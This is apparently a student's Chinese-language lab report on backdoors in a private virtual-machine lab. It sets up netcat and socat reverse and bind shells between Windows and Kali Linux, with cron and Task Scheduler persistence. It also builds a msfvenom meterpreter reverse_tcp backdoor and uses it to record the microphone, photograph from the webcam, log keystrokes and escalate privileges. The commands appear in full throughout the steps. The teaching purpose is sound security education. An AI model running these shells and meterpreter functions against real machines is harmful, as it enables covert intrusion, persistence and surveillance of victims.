Exp2 后门原理与实践

 

一、实践目标与内容

 

1.学习内容

 

• 使用nc实现win，mac,Linux间的后门连接
• meterpreter的应用
• MSF POST 模块的应用

 

2.学习目标

 

• 学习建立一个后门连接，并了解其中的知识点，同时熟悉后门连接的功能。通过亲手实践并了解这一事实，提高自己的安全意识 。

 

3.概念

 

• 后门就是不经过正常认证流程而访问系统的通道。
• netcat是一个底层工具，进行基本的TCP UDP数据收发。常被与其他工具结合使用，起到后门的作用。
• socat是ncat的增强版，它使用的格式是socat [options] 
   
• 其中两个address是必选项，而options 是可选项。socat的基本功能就是建立两个双向的字节流，数据就在其间传输，参数address就是代表了其中的一个方向。所谓流，代表了数据的流向，而数据则可以有许多不同的类型，命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

二、实践步骤:常用的后门工具的应用

2.1 Windows与linux间获取Shell

2.1.1 Windows主机获取 Linux Shell

Windows：

1. win主机查本机IP地址：ipconfig
   

    

由上图可见IPv4 地址为：192.168.72.1

2.利用netcat.exe程序监听端口：4303

kali：

3.使用nc 192.168.72.1 4303 -e /bin/sh指令反向连接Windows主机的4303端口：

 

注意：192.168.72.1为win主机地址，即第一步的操作，端口号为自己学号.

4.Windows执行linux shell指令

 

此时可以在win_cmd.exe下运行linux 指令

2.1.2 Linux主机获取 Windows shell

Linux ：

1. 查看kali主机IP地址：ifconfig

 

上图可见kali主机IP地址为192.168.72.128

2.输入nc -l -p 4303

 

Windows：

3.在cmd窗口使用 ncat.exe -e cmd.exe 192.168.72.128 4303命令去连接Linux的4303端口。

 

 

4.Linux运行Windows shell

 

ps：连接成功后便可以在linux主机输入windows指令，正常情况下为乱码.

2.2 ncat进行数据传输

1.Windows输入指令ncat.exe -l 4303 监听

2.Linux输入指令nc 192.168.72.1 4303 连接win主机

3.双向传输字符串

 

 

2.3 ncat 定时启动

1.Windows输入指令ncat.exe -l -p 4303 监听

2.Linux输入指令crontab -e ,选择一个文本编辑器打开，在最后一行添加代码：30 * * * * /bin/netcat Win的IP 端口 -e /bin/sh 在每小时的30分运行ncat回连win主机

 

3.时间一到，可以运行Linux shell指令了

 

 

注：我当时时间设置代码的时间是20：27，所以3分后就可以看到结果。

2.4

1.找到控制面板，依次打开 控制面板->系统和安全->管理工具->任务计划，新建一个任务

 

设置如上

2.新建一个触发器

 

设置如上

3.新建一个操作

 

设置如上，其中参数为tcp-listen:4303 exec:cmd.exe,pty,stderr ，4303为端口号.

4.检查程序是否在运行

 

 

5.Linux输入指令 socat - tcp:192.168.72.1:4303, windows主机IP、端口号，此时可以获取win的shell命令

 

三、体验 MSF Meterpreter 功能

3.1 利用msfvenom指令生成后门程序

1.在Linux主机输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20154303_backdoor.exe ，此条指令意为生成一个.exe程序，名称为 20154303_backdoor,将来在windows上运行时会回连到Linux主机相应端口

2.成功之后该文件在当前目录，找到之后拷贝到Windows主机，地址任意。

 

 

3.2 linux进入控制台进行设置

1.Linux输入指令msfconsole

 

2.在msf>下输入命令use exploit/multi/handler

3.继续输入set payload windows/meterpreter/reverse_tcp 设置payload

4.输入指令set LHOST Linux IP

5.输入指令 set LPORT 4303

6.输入指令show options

 

3.3 linux开启监听，windows运行后门

1.Linux输入指令exploit 开始监听

2.windows主机双击后门木马程序执行

 

 

3.4 Linux主机操控Windows主机

3.4.1 输入指令record_mic 录制一段音频

 

3.4.2 输入指令webcam_snap 拍摄照片

 

不太好意思出镜......

3.4.3 输入指令keyscan_start记录击键内容，输入指令keyscan_dump 获取击键记录

 

下图是我在win主机上输入的内容

 

3.4.4 输入指令getuid 查看当前用户，输入指令getsystem 提权

 

 

四、回答问题

1.例举你能想到的一个后门进入到你系统中的可能方式？

下载盗版的软件。

2.例举你知道的后门如何启动起来(win及linux)的方式？

win中的后门伴随软件启动

linux可以用corn启动

3.Meterpreter有哪些给你映像深刻的功能？

录音拍照截屏以及记录键击，可能泄露大量隐私。

4.如何发现自己有系统有无后门

安装可靠的杀毒软件

五、实验感想

这次实验的结果使我感到十分震撼，我才发现通过后门，我们的隐私以及个人信息会如此轻易的泄露出去，这提高了我的警觉。实验过程并不难，我的问题是kali和本机地址开始不在同一网段上导致无法进行，后来设置虚拟器子网改变了ip地址，使实验顺利进行下去。